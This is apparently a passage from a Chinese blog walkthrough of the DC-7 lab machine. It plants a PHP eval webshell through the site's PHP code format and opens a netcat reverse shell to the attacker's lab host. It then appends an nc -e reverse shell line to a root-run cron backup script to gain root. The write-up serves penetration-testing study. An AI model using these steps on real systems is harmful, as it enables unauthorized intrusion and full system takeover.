<h3 id="一句话木马注入"><a href="#一句话木马注入" class="headerlink" title="一句话木马注入"></a>一句话木马注入</h3><blockquote>
<?php @eval($_POST['shell']); ?>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088257803.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>保存<code>Save</code>，然后就会跳转到该网页：<a target="_blank" rel="noopener" href="http://192.168.204.136/node/4">http://192.168.204.136/node/4</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088339240.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用中国蚁剑进行连接测试。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088475791.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>码垛，逆子！</p>
<p>想开点，或许是新建的网页页面没有权限呢！</p>
<p>那直接对首页页面进行修改注入吧</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088595614.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>仍然报错。</p>
<blockquote>
<p>码垛！从最开始进行一句话木马的时候就已经错了。不是随便在哪种文档格式<code>text format</code>下写入再转换都行，会发生歧义的。</p>
<p>由于编辑界面进去，原文件默认使用的是html格式，所以会默认选择并以html格式显示数据。如果在该格式下直接将一句话木马复制上去的话，那就会被浏览器当作是html文本，再切换为<code>PHP code</code>的时候就会被浏览器解析成将一句话木马的文本转换为php格式。与我们写入的语义完全不一样了。</p>
<p>那个<code>&lt;P&gt;&lt;/P&gt;</code>标签就表示了其中的一句话内容是文本。那测试连接又怎么会成功执行一句话木马？</p>
<p>所以，需要一开始就先转化为<code>PHP code</code>，再复制一句话木马进去。</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091222475.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>要让一句话木马在<code>PHP code</code>格式下也显示为我们复制进去的模样。</p>
<p>在中国蚁剑测试连接：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091249617.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><p>打开虚拟终端，执行反弹shell命令。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -e /bin/bash 192.168.204.128 9999<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091441795.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>提前在终端打开监听，成功get到反弹来的shell。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091421612.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查看具有SUID权限的命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -u=s -<span class="hljs-built_in">type</span> f 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722092334695.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>同样的，参照以往的经验，成功率较大的命令提权是exim4，根据上述开发者提供的信息，使用的是exim 4.89，在尝试利用的时候，发现它主要是通过<code>BDAT拒绝服务攻击</code>实现的。有关于这个漏洞攻击的参考资料较少，相关的参考，其实现起来也比较复杂。</p>
<p>尝试切换思路。对开发者账户的那个<code>backups.sh</code>耿耿于怀。</p>
<p>之前我们在开发者账户中，通过尝试证明了我们（开发者普通用户状态）具有执行脚本的权限，但是没有修改脚本的权限。显然，修改脚本文件所需要的权限更高。</p>
<p>使用<code>ls -l</code>查看该脚本文件的属主和属组情况。（当然是在开发者账户哈）</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722092909249.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>得到如下信息：</p>
<blockquote>
<p>-rwxrwxr-x：文件所有者（root）具有rwx读、写、执行权限，文件所在组（www-data）具有rwx读、写、执行权限，其它用户（r-x）只具有读和执行权限。</p>
<p>1：文件的硬链接计数。对于普通文件，这个数字通常是 1，表示文件只有一个链接</p>
<p>root：文件所有者user</p>
<p>www-data：文件所属组group</p>
<p>520：文件大小，以字节为单位</p>
<p>Aug 29  2019：文件的最后修改日期</p>
<p>backups.sh：文件名</p>
</blockquote>
<p>简而言之，这个文件的所有者是root，之前我们进行反弹shell的时候，也是反弹所在用户的shell。</p>
<p>那么利用<code>root：文件所有者user; www-data：文件所属组group</code>这两个信息，在www-data端对脚本文件进行修改，注入反弹shell命令，然后执行，尝试反弹脚本所有者root的权限。</p>
<p>根据之前在开发者账户收到的邮件信息：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722093747595.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以发现，数据库备份的操作总是由root执行，那么它记录的相关信息记录也应该是root方的信息，包括脚本文件的位置。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722093843445.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>果然。接下来就对脚本文件进行编辑吧。</p>
<p>使用<code>nano</code>命令修改脚本文件受阻，可能是由于远程连接不稳定的因素造成的。</p>
<p><code>vim</code>命令也不行，提示<code>command not found</code>，没有这个命令捏</p>
<p>那就使用<code>echo</code>命令将反弹shell的命令追加到脚本文件中！！！</p>
<blockquote>
<p>覆盖写入使用一个<code>&gt;</code></p>
<p>追加写入使用两个<code>&gt;&gt;</code></p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;nc -e /bin/bash 192.168.204.128 6666&quot;</span> &gt;&gt; backups.sh<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094500045.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>ok！追加成功。码垛，发现反弹回来的是<code>www-data</code>属组的shell。可能因为在执行脚本文件中的命令时，实际上是调用用户的命令权限执行的，也就是说，相当于是<code>www-data</code>属组执行了反弹shell，反弹回来的当然是<code>www-data</code>属组的命令。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094610411.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>别忘了，普通用户也有执行权限，修改文件成功之后，可以让开发者用户去执行这个脚本文件。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094858294.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到，<code>dc7user</code>处的<code>backups.sh</code>文件内容也跟着修改了。尝试执行！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094992931.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>坏，也是反弹回<code>dc7user</code>的权限了。<code>dc7user</code>的问题和<code>www-data</code>的一样。</p>
<p>回顾之前的<code>dc7user</code>收到的邮件内容，发现它的每封邮件都是在04秒发送，而且两封邮件之间规律性地相隔15分钟，感觉像是定时任务。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722095478559.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<blockquote>
<p>**<code>Cron</code>**：指示这是 <code>cron</code> 服务相关的日志信息。</p>
<p><code>Cron</code> 是一个 Unix&#x2F;Linux 系统中的任务调度程序，它用于按 预设的时间计划 执行命令或脚本。</p>
</blockquote>
<p>果然是定时执行，那既然我们已经成功修改了脚本文件，那就等待root用户的定时任务自动触发脚本吧。</p>
<p>等待！</p>
<p>ok ！给我等到了！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096051733.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>ok！找flag！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096152218.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>cat！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096165290.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>ok！成功了。至此，所有任务结束。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ul>
<li>首先就是这个跳出惯性思维的过程。不仅限于技术攻克，有时候可以通过一些可能不经意被泄露出来的用户信息，通过社会工程攻击，来获取一些重要信息。</li>
<li><code>echo</code>命令可以对脚本文件（.sh）进行覆写<code>&gt;</code>或追加<code>&gt;&gt;</code></li>
<li>信息检索是一个比较庞大的工程，需要仔细且不放过任何细节。</li>
<li>本次提权利用的是<code>root</code>用户设置的<code>Cron</code>定时任务，获得反弹shell的</li>
<li><code>ls -l</code>查看文件属组和属主信息</li>
<li>后台管理系统最重要的就是能够获取webshell，拿到站点才有机会进一步提权</li>
<li>一些脚本文件中可能存在可以利用的地方，比如<code>脚本中的命令</code>。</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>DC-7</div>
      <div>https://haoisbinlove.github.io/2024/07/30/DC-7/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Sweety</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年7月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/30/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%EF%BC%88%E4%B8%80%EF%BC%89/" title="渗透测试（一）">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">渗透测试（一）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/30/DC-6/" title="DC-6">
                        <span class="hidden-mobile">DC-6</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
